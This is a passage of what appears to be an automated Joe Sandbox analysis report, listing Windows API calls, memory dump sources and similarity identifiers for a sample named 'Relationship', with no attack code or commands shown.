                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C82DDB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C2C213
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C2C221
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2C27C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0